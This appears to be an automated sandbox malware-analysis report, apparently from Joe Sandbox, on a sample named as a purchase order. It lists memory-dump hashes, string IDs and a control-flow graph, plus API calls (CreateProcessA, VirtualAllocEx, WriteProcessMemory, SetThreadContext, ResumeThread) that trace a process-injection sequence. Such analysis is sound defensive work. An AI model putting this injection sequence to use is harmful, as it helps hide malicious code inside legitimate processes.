                                                                        • String ID: (bq$Hbq
                                                                        • API String ID: 0-4081012451
                                                                        • Opcode ID: fa02dbc35db3eb17d2393968762d3808261e24fa930bd4c9df817a23357a990b
                                                                        • Instruction ID: 3943413b889d0d5120b410957361cee338072d15403b31b73260a1446671b0dc
                                                                        • Opcode Fuzzy Hash: fa02dbc35db3eb17d2393968762d3808261e24fa930bd4c9df817a23357a990b
                                                                        • Instruction Fuzzy Hash: 2241AC322047058FD725DF29C58071ABAF2FF85310F108A69D0A68B7E5DB78E849CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2950 5ad41e8-5ad41f6 2951 5ad41f8-5ad41fc 2950->2951 2952 5ad4213-5ad4216 2950->2952 2953 5ad41fe-5ad4208 2951->2953 2954 5ad420a 2951->2954 2955 5ad420f-5ad4211 2953->2955 2954->2955 2955->2952 2956 5ad4219-5ad4226 2955->2956 2967 5ad4229 call 5ad0ba0 2956->2967 2968 5ad4229 call 5ad0bb0 2956->2968 2957 5ad422c-5ad422e 2958 5ad4265-5ad4268 2957->2958 2959 5ad4230-5ad4234 2957->2959 2959->2958 2960 5ad4236-5ad423a 2959->2960 2961 5ad423c-5ad4245 2960->2961 2962 5ad425b 2960->2962 2963 5ad424c-5ad424f 2961->2963 2964 5ad4247-5ad424a 2961->2964 2965 5ad425e 2962->2965 2966 5ad4259 2963->2966 2964->2966 2965->2958 2966->2965 2967->2957 2968->2957
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q
                                                                        • API String ID: 0-355816377
                                                                        • Opcode ID: 917a4db7220b94cb97deade6be386769d6b9ea0e90e1abb2fe376a9c57c48280
                                                                        • Instruction ID: cbd91a4160ca467e2356d65dbf6e232cd61a9f5d3d570f75e7c9a33546110c6e
                                                                        • Opcode Fuzzy Hash: 917a4db7220b94cb97deade6be386769d6b9ea0e90e1abb2fe376a9c57c48280
                                                                        • Instruction Fuzzy Hash: 86113C316442099FEF24DF99D444FA9BBFABB58250F144066D426DB264D6B1D980C760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;$Y
                                                                        • API String ID: 0-874568597
                                                                        • Opcode ID: 84508983d2c1d457afc138122407583359174960f08335b58c10e3051135711d
                                                                        • Instruction ID: 216dc3b3fc08e761e42b0de18baf0554a7f25d006be16e115c995336f6edaa93
                                                                        • Opcode Fuzzy Hash: 84508983d2c1d457afc138122407583359174960f08335b58c10e3051135711d
                                                                        • Instruction Fuzzy Hash: E811DB74A00129DFDB60DF54D899B9ABBB5FB48348F1040E5964DA7740DB346EC4CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,bq
                                                                        • API String ID: 0-2474004448
                                                                        • Opcode ID: 1834b404678fcd17955d41e98dce95375cd35a21fea02d432ff7489b7bc8f4cc
                                                                        • Instruction ID: 9af1bd140e1ca3297ef9e5c49c53f803dd8c752dc42198037bf97e80f6d7affc
                                                                        • Opcode Fuzzy Hash: 1834b404678fcd17955d41e98dce95375cd35a21fea02d432ff7489b7bc8f4cc
                                                                        • Instruction Fuzzy Hash: 0D521D75A002288FDB64DF68C985BEDBBF2BF88300F1545D9E509AB391DA349D81CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (_^q
                                                                        • API String ID: 0-538443824
                                                                        • Opcode ID: f5319266dc696d0c2a112370ada8b626e1ae5f9d40473e0896146dae9b8c8eda
                                                                        • Instruction ID: fce177297cb8f531026850948dc84dd8c5cb1e97db0888e25af3e23e53baed00
                                                                        • Opcode Fuzzy Hash: f5319266dc696d0c2a112370ada8b626e1ae5f9d40473e0896146dae9b8c8eda
                                                                        • Instruction Fuzzy Hash: FB226F36A002199FDB04EF54D495EADBBF6FF88300F148469E9169B3A5CB75EC40CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D14C57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 7b46e1af7dd36b0a25f1694788484f80afaba18660dbadbb25196cbc03e7322b
                                                                        • Instruction ID: 3751a147a52798cc428e5ee858ac9f9f0e72ad142a26dd011c4bfc070ebfa6f1
                                                                        • Opcode Fuzzy Hash: 7b46e1af7dd36b0a25f1694788484f80afaba18660dbadbb25196cbc03e7322b
                                                                        • Instruction Fuzzy Hash: B4A113B1D003189FDF10CFA9D985BEDBBF1BB09314F14916AE859A7280DB349985CF49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D14C57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 86056fca5a2c241afe384bf88f3c5a9575f0d9cfd606dbe40de2e4a9d3096a6b
                                                                        • Instruction ID: bcfc6b66de287592988b9838eaedd499b83bca18dd62c0de10ebd832fee8e5d4
                                                                        • Opcode Fuzzy Hash: 86056fca5a2c241afe384bf88f3c5a9575f0d9cfd606dbe40de2e4a9d3096a6b
                                                                        • Instruction Fuzzy Hash: 3EA102B0D003189FDF10CFA9D985BEEBBF1BB09314F14916AE859A7240DB349985CF89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D157B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 6ba8b4468ecab82754c8b0af317b4fe2f078372513c1b89b592b02a94985ef4a
                                                                        • Instruction ID: ef647f4dcc0bbad8ae2aa2b6ef3b20d07426142f836690dd0b4a97c5c372643d
                                                                        • Opcode Fuzzy Hash: 6ba8b4468ecab82754c8b0af317b4fe2f078372513c1b89b592b02a94985ef4a
                                                                        • Instruction Fuzzy Hash: 7851DDB5D042489FCF00CFA9D984ADEBBF1BF49310F24942AE819B7250D739AA45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D157B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 3462dd7b2ae2ba92f4aea2bed692c3df5bd53b476495ee1571a9c8f7b26bc0a1
                                                                        • Instruction ID: 574c4912a59d7fde74e95b4c1e66bd3439adbb6623907e267674a4f498b682d2
                                                                        • Opcode Fuzzy Hash: 3462dd7b2ae2ba92f4aea2bed692c3df5bd53b476495ee1571a9c8f7b26bc0a1
                                                                        • Instruction Fuzzy Hash: 5141AAB5D012589FCF00CFA9D984ADEFBF1BB49314F20902AE819B7210D738AA45CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D154CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 29690c6bb9319a6dd4d3221e6db4f2f1171ad780658a96b314aa36a98f8f5a9a
                                                                        • Instruction ID: 8b8d2a17b4926323bfc61019dc4e422d7143e0f9da5bd72961990014b7b3dc9b
                                                                        • Opcode Fuzzy Hash: 29690c6bb9319a6dd4d3221e6db4f2f1171ad780658a96b314aa36a98f8f5a9a
                                                                        • Instruction Fuzzy Hash: B03188B9D002589FCF10CFA9E985ADEFBB1BB49310F10942AE815B7310D735A946CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D154CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 05e91252ab16954dab97b87315c9c7e89a378c891ebf7526993a4e20e547f027
                                                                        • Instruction ID: dacdb5f07854804ba431d61a4e9072ee66ab841e5af8e8fed84b5c5e385ddcb7
                                                                        • Opcode Fuzzy Hash: 05e91252ab16954dab97b87315c9c7e89a378c891ebf7526993a4e20e547f027
                                                                        • Instruction Fuzzy Hash: E73187B9D042589FCF10CFA9E980ADEFBB1BB49320F10942AE815B7210D735A945CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05C0D69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 31607b93e08c2ae47103564a9c1fb1143b950d872f60c1d64c45602292b4a506
                                                                        • Instruction ID: 82b85e791e330621cb654737d146ba39f8d19b5bbdb04c2fbc26686c1529a8db
                                                                        • Opcode Fuzzy Hash: 31607b93e08c2ae47103564a9c1fb1143b950d872f60c1d64c45602292b4a506
                                                                        • Instruction Fuzzy Hash: 413199B4D012589FCF10CFA9D984ADEFBB1BB49320F20942AE819B7210D735A945CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 05D14E4F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 8b2c3c760804620fcdd3f5d9940799444753ba02a88b28e744543fd4cf3eda6d
                                                                        • Instruction ID: 1bb24d5988e9fc362cd2541a6e2404835e91861d96f7711e2d951cb3437ffb23
                                                                        • Opcode Fuzzy Hash: 8b2c3c760804620fcdd3f5d9940799444753ba02a88b28e744543fd4cf3eda6d
                                                                        • Instruction Fuzzy Hash: 54419DB5D012589FCB10CFA9D985ADEFBF1BF49314F24802AE419B7250D738A945CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 05D14E4F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 91e780bbb1a375a36c47f6894bae5a8552792c339982c9d5f560c20ad60b99cb
                                                                        • Instruction ID: 2dcd564f7b61d5367f33f5b2fd771f8f60ac33d8b79a609708ef364b893aa34d
                                                                        • Opcode Fuzzy Hash: 91e780bbb1a375a36c47f6894bae5a8552792c339982c9d5f560c20ad60b99cb
                                                                        • Instruction Fuzzy Hash: 9D31AEB5D012589FCF10CFA9D984ADEFBF1BB49314F24802AE415B7250D738A945CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 05D15AF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 3df14bfa31a0650369d9960af79776881388c1f61b682ccf59ae30ec7d3184a4
                                                                        • Instruction ID: 05eb72224b1ae6b43741ca3ade8c91b545578b0b36faaa2c4ac87ae17425285d
                                                                        • Opcode Fuzzy Hash: 3df14bfa31a0650369d9960af79776881388c1f61b682ccf59ae30ec7d3184a4
                                                                        • Instruction Fuzzy Hash: 5331ACB9D012589FCB14CFA9E585ADEFBB1BF49314F14942AE815B7310C738A941CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 05D15AF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: c2d8c74034e5e3fe9ce837e37778c62b2ef319bc6e2dd7765f58d6b1432cfb5a
                                                                        • Instruction ID: 94a6addde0cc6e9c73595acf9b6f786781f2932a65509991e51fbe305ebf4668
                                                                        • Opcode Fuzzy Hash: c2d8c74034e5e3fe9ce837e37778c62b2ef319bc6e2dd7765f58d6b1432cfb5a
                                                                        • Instruction Fuzzy Hash: EF31ACB4D012589FCB14CFA9E985ADEFBB5BB49320F10942AE815B7310C739A941CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hbq
                                                                        • API String ID: 0-1245868
                                                                        • Opcode ID: 98a69b44ba6cb4e85ec5529faca930aaf1a3724b2cfbb49ca6feb7cd720f33b8
                                                                        • Instruction ID: 7efb70b3594450da4c004c328f8fdcb749de01f94c0083d1e0d74c6ab69ee819
                                                                        • Opcode Fuzzy Hash: 98a69b44ba6cb4e85ec5529faca930aaf1a3724b2cfbb49ca6feb7cd720f33b8
                                                                        • Instruction Fuzzy Hash: D9D11D35A00209DFCB04EFA4D594DADBBB2FF89310F118569E906AB364DB34ED46CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: d73f6d4dadcfe072a46cc8858ca2cfe56b68c4028d8323b2c8e435face516135
                                                                        • Instruction ID: 3def80ddde88cf9a5c7139aab4a88fcc34320e2ff85b04022a6114aaee370c6e
                                                                        • Opcode Fuzzy Hash: d73f6d4dadcfe072a46cc8858ca2cfe56b68c4028d8323b2c8e435face516135
                                                                        • Instruction Fuzzy Hash: 82A1CA34A10218DFCB04EBA4D998E9DFBB2FF88301F118159E506AB3A5DB34EC46CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
                                                                        • Opcode ID: 65399b2c37a122b3aebff801934ebfcbad309cc31b9c82a5b79948150c3ba99e
                                                                        • Instruction ID: 100c2bc56e6757e36415a7cf34e989363bb6504a7b7597644c9b7be0b388cd57
                                                                        • Opcode Fuzzy Hash: 65399b2c37a122b3aebff801934ebfcbad309cc31b9c82a5b79948150c3ba99e
                                                                        • Instruction Fuzzy Hash: 8D713A75B006098FCB14DBA9D99466EFBF3FFC8310F2485A9D42AA7794DB30E9018B51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 7abaa3af6812a35b3478b45224ddca9ad093c70bae4506eb28b1bbda0877e821
                                                                        • Instruction ID: b5cb980930fedd7a0b9e89558786110c3b7d4b84f3f9fbb21541af3a6c379f71
                                                                        • Opcode Fuzzy Hash: 7abaa3af6812a35b3478b45224ddca9ad093c70bae4506eb28b1bbda0877e821
                                                                        • Instruction Fuzzy Hash: EE711F35B402189FDB04EB64D564FAEB7B7BB88710F508468E506AB3A4CF75EC42CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
                                                                        • Opcode ID: 16f6ca3fa2aad4fe51bffddff911d3a30595a7abb3cdc51189fc87107b63291e
                                                                        • Instruction ID: 969559970b89e455cc2f42df5752fa348bad154bff1216a88dc9761b6070b2da
                                                                        • Opcode Fuzzy Hash: 16f6ca3fa2aad4fe51bffddff911d3a30595a7abb3cdc51189fc87107b63291e
                                                                        • Instruction Fuzzy Hash: 93714834710618CFCB04FB64D598EAEB7B6AF89700F508569D5039B3A4DF34AD46CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: ddda052b618ed7eae7ef8a0d367881700a7b9c4d84f12f34d7b10290e3da8427
                                                                        • Instruction ID: e41688e77277b0069399cca7c920f68a42ac9da73b162df945b65be053f41e4a
                                                                        • Opcode Fuzzy Hash: ddda052b618ed7eae7ef8a0d367881700a7b9c4d84f12f34d7b10290e3da8427
                                                                        • Instruction Fuzzy Hash: 04518D35B002158FCB14BB65C598DAEF7B6EF88710F50452AE507AB394CF74AC46CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
                                                                        • Opcode ID: 4091e522e29182c564cde660faea2d73bed0caa3ba8ea7673689fbf6f5313a8d
                                                                        • Instruction ID: 7195c9bfc31ff95389032481d2aefb3ca0491a8a5b899508a3cb60f91d71c0c6
                                                                        • Opcode Fuzzy Hash: 4091e522e29182c564cde660faea2d73bed0caa3ba8ea7673689fbf6f5313a8d
                                                                        • Instruction Fuzzy Hash: 39416D36704114AFCB159F68D814E59BFB6FF99710B1680AAE20ACF3B2CA35D812DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq
                                                                        • API String ID: 0-1911830065
                                                                        • Opcode ID: a8b1ce0029613cd9bd62fb64f6628bc34117037e5ae8f822faa702c198672e56
                                                                        • Instruction ID: 452fed1b6fd921d3b397b36309bbad2a55f3fee22e3147de0e6dd0824370eb67
                                                                        • Opcode Fuzzy Hash: a8b1ce0029613cd9bd62fb64f6628bc34117037e5ae8f822faa702c198672e56
                                                                        • Instruction Fuzzy Hash: 3451F275E00208DFCB04DFA9D999AADBBF2FF88300F10942AE956A7350DB786945CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq
                                                                        • API String ID: 0-1911830065
                                                                        • Opcode ID: c20a5f961195c057614f7be95fab554b10f54d7a7a7b1594037b1312fb15d68c
                                                                        • Instruction ID: 60a1685e1ff3246e7bd15db48b858d3725221ebdf490aa9380bf70aad7396725
                                                                        • Opcode Fuzzy Hash: c20a5f961195c057614f7be95fab554b10f54d7a7a7b1594037b1312fb15d68c
                                                                        • Instruction Fuzzy Hash: D85123B5E00208DFCB04DFA8D9596ADBBF2FF88300F14942AE955A7350DB786945CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: pbq
                                                                        • API String ID: 0-3896149868
                                                                        • Opcode ID: 212111cf8585bb9562ccb829d4d7ea2f37d3042c9be53e557f366fd476c13d81
                                                                        • Instruction ID: ec074aa14b6b45f4d295745e759cd91d4cea026ff820bdf1d6aa0ceb630bafb1
                                                                        • Opcode Fuzzy Hash: 212111cf8585bb9562ccb829d4d7ea2f37d3042c9be53e557f366fd476c13d81
                                                                        • Instruction Fuzzy Hash: 5241E676600104AFCB4A9FA8C954D69BBF7FF8D3147168494E2099B276DB32DC22EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @pM2
                                                                        • API String ID: 0-1671532473
                                                                        • Opcode ID: 935e9916b42b0499074c3be890b63324c4c5c27e1ed63bd8f2e0222cff44a3c8
                                                                        • Instruction ID: cb98dfdd77aeb6e0826f11724448811e4b3ca9ab4bf9059ef86c9d12b240586a
                                                                        • Opcode Fuzzy Hash: 935e9916b42b0499074c3be890b63324c4c5c27e1ed63bd8f2e0222cff44a3c8
                                                                        • Instruction Fuzzy Hash: D6510574D00208CFDB68CFA9D584A9DBBB2FF49304F20816AE419AB361DB31A941DF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,bq
                                                                        • API String ID: 0-2474004448
                                                                        • Opcode ID: 4935c87567685d367a407f828f9a4fe5adbef33e85ec197d3eb835a03269f47f
                                                                        • Instruction ID: 64362c48946b6aeb155550f04940a34606b7f0c2c46e5a390f015781e509e4b7
                                                                        • Opcode Fuzzy Hash: 4935c87567685d367a407f828f9a4fe5adbef33e85ec197d3eb835a03269f47f
                                                                        • Instruction Fuzzy Hash: 944169357401198FCB04EF69C8549AEBBF2FF85350F25806AE906DB361DB31EC418BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
